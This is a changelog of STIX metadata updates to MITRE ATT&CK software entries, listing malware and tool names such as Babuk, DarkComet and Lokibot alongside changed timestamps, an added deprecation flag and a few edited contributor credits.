values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:27.718000+00:00 | 2025-04-25 14:44:14.945000+00:00

[S0045] ADVSTORESHELL

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:45.086000+00:00 | 2025-04-25 14:45:09.488000+00:00

[S0092] Agent.btz

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:03.857000+00:00 | 2025-04-25 14:43:05.955000+00:00

[S0622] AppleSeed

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:59.641000+00:00 | 2025-04-25 14:42:53.967000+00:00

[S0129] AutoIt backdoor

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:43.395000+00:00 | 2025-04-25 14:45:05.203000+00:00

[S0640] Avaddon

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:10.078000+00:00 | 2025-04-25 14:43:26.180000+00:00

[S1053] AvosLocker

Current version: 1.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:54.114000+00:00 | 2025-04-21 19:40:47.538000+00:00
x_mitre_contributors[0] | Flavio Costa, Cisco | Flávio Costa, @Segurança Descomplicada

[S0245] BADCALL

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:26.720000+00:00 | 2025-04-25 14:44:12.926000+00:00

[S0642] BADFLICK

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:09.558000+00:00 | 2025-04-25 14:43:25.093000+00:00

[S0128] BADNEWS

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:41.446000+00:00 | 2025-04-25 14:44:59.677000+00:00

[S0470] BBK

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:42.578000+00:00 | 2025-04-25 14:45:02.531000+00:00

[S0127] BBSRAT

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:13.507000+00:00 | 2025-04-25 14:43:36.304000+00:00

[S0360] BONDUPDATER

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:37.261000+00:00 | 2025-04-25 14:44:47.458000+00:00

[S0014] BS2005

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:14.043000+00:00 | 2025-04-25 14:43:38.100000+00:00

[S0043] BUBBLEWRAP

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:56.566000+00:00 | 2025-04-25 14:42:44.013000+00:00

[S0638] Babuk

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:12.880000+00:00 | 2025-04-25 14:43:34.138000+00:00

[S0337] BadPatch

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:25.897000+00:00 | 2025-04-25 14:44:11.108000+00:00

[S0234] Bandook

Current version: 2.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:20.706000+00:00 | 2025-04-25 14:43:54.316000+00:00

[S0239] Bankshot

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:57.714000+00:00 | 2025-04-25 14:42:48.512000+00:00

[S0564] BlackMould

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:13.187000+00:00 | 2025-04-25 14:43:35.224000+00:00

[S0486] Bonadan

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:06.109000+00:00 | 2025-04-25 14:43:14.836000+00:00

[S0635] BoomBox

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:34.236000+00:00 | 2025-04-25 14:44:37.490000+00:00

[S0651] BoxCaon

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:23.138000+00:00 | 2025-04-25 14:44:03.536000+00:00

[S0482] Bundlore

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:18.925000+00:00 | 2025-04-25 14:43:50.199000+00:00

[S0025] CALENDAR

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:10.875000+00:00 | 2025-04-25 14:43:28.496000+00:00

[S0465] CARROTBALL

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:52.338000+00:00 | 2025-04-25 14:45:20.112000+00:00

[S0222] CCBkdr

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:30.519000+00:00 | 2025-04-25 14:44:25.199000+00:00

[S0119] Cachedump

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:56.154000+00:00 | 2025-04-25 14:45:28.653000+00:00

[S0454] Cadelspy

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:29.046000+00:00 | 2025-04-25 14:44:19.544000+00:00

[S0077] CallMe

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:35.526000+00:00 | 2025-04-25 14:44:42.237000+00:00

[S0351] Cannon

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:36.652000+00:00 | 2025-04-25 14:44:46.016000+00:00

[S0335] Carbon

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:31.987000+00:00 | 2025-04-25 14:44:30.048000+00:00

[S0572] Caterpillar WebShell

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:17.640000+00:00 | 2025-04-25 14:43:46.592000+00:00

[S0220] Chaos

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:11.037000+00:00 | 2025-04-25 14:43:29.227000+00:00

[S0674] CharmPower

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:18.570000+00:00 | 2025-04-25 14:43:49.304000+00:00

[S0107] Cherry Picker

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:30.864000+00:00 | 2025-04-25 14:44:26.291000+00:00

[S0660] Clambling

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:16.175000+00:00 | 2025-04-25 14:43:43.008000+00:00

[S0611] Clop

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:35.205000+00:00 | 2025-04-25 14:44:41.142000+00:00

[S0054] CloudDuke

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:35.863000+00:00 | 2025-04-25 14:44:42.958000+00:00

[S0338] Cobian RAT

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:29.365000+00:00 | 2025-04-25 14:44:21.097000+00:00

[S0369] CoinTicker

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:36.473000+00:00 | 2025-04-25 14:44:45.121000+00:00

[S0244] Comnie

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:43.241000+00:00 | 2025-04-25 14:45:04.669000+00:00

[S0050] CosmicDuke

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:00.812000+00:00 | 2025-04-25 14:42:57.253000+00:00

[S0538] Crutch

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:23.296000+00:00 | 2025-04-25 14:44:04.068000+00:00

[S0498] Cryptoistic

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:27.529000+00:00 | 2025-04-25 14:44:14.409000+00:00

[S0625] Cuba

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:15.861000+00:00 | 2025-04-25 14:43:42.282000+00:00

[S0616] DEATHRANSOM

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:16.017000+00:00 | 2025-04-25 14:43:42.648000+00:00

[S0334] DarkComet

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:08.057000+00:00 | 2025-04-25 14:43:20.605000+00:00

[S1111] DarkGate

Current version: 1.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2024-09-29 10:22:45.776000+00:00 | 2025-04-22 22:18:48.564000+00:00
x_mitre_contributors[1] | Phyo Paing Htun (ChiLai) | Phyo Paing Htun (ChiLai), I-Secure Co.,Ltd

[S0187] Daserf

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:31.680000+00:00 | 2025-04-25 14:44:29.509000+00:00

[S0243] DealersChoice

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:22.471000+00:00 | 2025-04-25 14:44:02.087000+00:00

[S0200] Dipsind

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:39.512000+00:00 | 2025-04-25 14:44:54.842000+00:00

[S0600] Doki

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:06.758000+00:00 | 2025-04-25 14:43:17.148000+00:00

[S0186] DownPaper

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:40.332000+00:00 | 2025-04-25 14:44:56.608000+00:00

[S0134] Downdelph

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:53.960000+00:00 | 2025-04-25 14:42:36.848000+00:00

[S0547] DropBook

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:03.046000+00:00 | 2025-04-25 14:43:03.619000+00:00

[S0502] Drovorub

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:25.508000+00:00 | 2025-04-25 14:44:09.839000+00:00

[S0062] DustySky

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:14.194000+00:00 | 2025-04-25 14:43:38.466000+00:00

[S0024] Dyre

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:13.036000+00:00 | 2025-04-25 14:43:34.862000+00:00

[S0593] ECCENTRICBANDWAGON

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:41.289000+00:00 | 2025-04-25 14:44:59.309000+00:00

[S0624] Ecipekac

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:59.458000+00:00 | 2025-04-25 14:42:53.604000+00:00

[S0554] Egregor

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:36.019000+00:00 | 2025-04-25 14:44:43.318000+00:00

[S0091] Epic

Current version: 1.3

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:15.497000+00:00 | 2025-04-25 14:43:41.197000+00:00

[S0361] Expand

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:56.328000+00:00 | 2025-04-25 14:45:29.018000+00:00

[S0569] Explosive

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:15.035000+00:00 | 2025-04-25 14:43:40.097000+00:00

[S0181] FALLCHILL

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:45.711000+00:00 | 2025-04-25 14:45:10.924000+00:00

[S0173] FLIPSIDE

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:55.971000+00:00 | 2025-04-25 14:42:42.171000+00:00

[S0628] FYAnti

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:04.305000+00:00 | 2025-04-25 14:43:07.972000+00:00

[S0076] FakeM

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:32.986000+00:00 | 2025-04-25 14:44:33.289000+00:00

[S0512] FatDuke

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:08.387000+00:00 | 2025-04-25 14:43:21.871000+00:00

[S0171] Felismus

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:57.048000+00:00 | 2025-04-25 14:42:46.344000+00:00

[S0679] Ferocious

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:17.322000+00:00 | 2025-04-25 14:43:45.868000+00:00

[S0120] Fgdump

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:51.728000+00:00 | 2025-04-25 14:45:18.484000+00:00

[S0355] Final1stspy

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:28.188000+00:00 | 2025-04-25 14:44:16.040000+00:00

[S0696] Flagpro

Current version: 1.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2024-09-04 21:39:21.144000+00:00 | 2025-04-25 19:04:04.232000+00:00
x_mitre_contributors[0] | Hannah Simes, BT Security | Hannah S

[S0193] Forfiles

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:54.018000+00:00 | 2025-04-25 14:45:23.318000+00:00

[S0503] FrameworkPOS

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:57.360000+00:00 | 2025-04-25 14:42:47.607000+00:00

[S0417] GRIFFON

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:52.695000+00:00 | 2025-04-25 14:42:33.402000+00:00

[S0049] GeminiDuke

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:57.198000+00:00 | 2025-04-25 14:42:46.881000+00:00

[S0460] Get2

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:54.423000+00:00 | 2025-04-25 14:42:37.942000+00:00

[S0561] GuLoader

Current version: 2.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:04.665000+00:00 | 2025-04-25 14:43:09.227000+00:00

[S0132] H1N1

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:44.456000+00:00 | 2025-04-25 14:45:07.358000+00:00

[S0151] HALFBAKED

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:55.633000+00:00 | 2025-04-25 14:42:41.277000+00:00

[S0246] HARDRAIN

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:33.134000+00:00 | 2025-04-25 14:44:34.161000+00:00

[S0617] HELLOKITTY

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:11.555000+00:00 | 2025-04-25 14:43:30.306000+00:00

[S0070] HTTPBrowser

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:39.195000+00:00 | 2025-04-25 14:44:53.772000+00:00

[S0047] Hacking Team UEFI Rootkit

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:05.792000+00:00 | 2025-04-25 14:43:13.563000+00:00

[S0499] Hancitor

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:42.270000+00:00 | 2025-04-25 14:45:01.455000+00:00

[S0224] Havij

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:57.107000+00:00 | 2025-04-25 14:45:31.679000+00:00

[S0537] HyperStack

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:00.476000+00:00 | 2025-04-25 14:42:55.977000+00:00

[S0189] ISMInjector

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:11.226000+00:00 | 2025-04-25 14:43:29.589000+00:00

[S0483] IcedID

Current version: 1.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2024-10-28 19:20:20.633000+00:00 | 2025-04-22 22:16:09.049000+00:00
iterable_item_added
STIX Field | Old value | New Value
x_mitre_contributors | | Matt Brenton, Zurich Global Information Security
iterable_item_removed
STIX Field | Old value | New Value
x_mitre_contributors | Matt Brenton |

[S0259] InnaputRAT

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:34.903000+00:00 | 2025-04-25 14:44:39.436000+00:00

[S0260] InvisiMole

Current version: 2.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:05.140000+00:00 | 2025-04-25 14:43:10.665000+00:00

[S0389] JCry

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:29.735000+00:00 | 2025-04-25 14:44:21.898000+00:00

[S0201] JPIN

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:38.557000+00:00 | 2025-04-25 14:44:51.758000+00:00

[S0648] JSS Loader

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:43.545000+00:00 | 2025-04-25 14:45:05.560000+00:00

[S0528] Javali

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:13.353000+00:00 | 2025-04-25 14:43:35.588000+00:00

[S0271] KEYMARBLE

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:56.418000+00:00 | 2025-04-25 14:42:43.623000+00:00

[S0156] KOMPROGO

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:19.228000+00:00 | 2025-04-25 14:43:51.104000+00:00

[S0088] Kasidet

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:58.992000+00:00 | 2025-04-25 14:42:52.151000+00:00

[S0265] Kazuar

Current version: 1.3

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:07.739000+00:00 | 2025-04-25 14:43:19.859000+00:00

[S0585] Kerrdown

Current version: 2.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:21.498000+00:00 | 2025-04-25 14:43:59.023000+00:00

[S0599] Kinsing

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:37.411000+00:00 | 2025-04-25 14:44:48.521000+00:00

[S0437] Kivars

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:31.015000+00:00 | 2025-04-25 14:44:27.009000+00:00

[S0641] Kobalos

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:25.723000+00:00 | 2025-04-25 14:44:10.741000+00:00

[S0162] Komplex

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:42.776000+00:00 | 2025-04-25 14:45:02.893000+00:00

[S0042] LOWBALL

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:59.992000+00:00 | 2025-04-25 14:42:54.704000+00:00

[S0362] Linux Rabbit

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:56.120000+00:00 | 2025-04-25 14:42:42.534000+00:00

[S0513] LiteDuke

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:24.381000+00:00 | 2025-04-25 14:44:07.137000+00:00

[S0397] LoJax

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:32.158000+00:00 | 2025-04-25 14:44:30.421000+00:00

[S0447] Lokibot

Current version: 2.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:35.363000+00:00 | 2025-04-25 14:44:41.863000+00:00

[S0582] LookBack

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:35.052000+00:00 | 2025-04-25 14:44:40.541000+00:00

[S0121] Lslsass

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:50.784000+00:00 | 2025-04-25 14:45:15.980000+00:00

[S0532] Lucifer

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:08.548000+00:00 | 2025-04-25 14:43:22.226000+00:00

[S0010] Lurid

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:58.843000+00:00 | 2025-04-25 14:42:51.586000+00:00

[S0443] MESSAGETAP

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:26.051000+00:00 | 2025-04-25 14:44:11.465000+00:00

[S0233] MURKYTOP

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:37:52.514000+00:00 | 2025-04-25 14:42:32.856000+00:00

[S0282] MacSpy

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2025-04-16 20:38:44.003000+00:00 | 2025-04-25 14:45:06.639000+00:00

[S0652] MarkiRAT

Current version: 1.0

Details
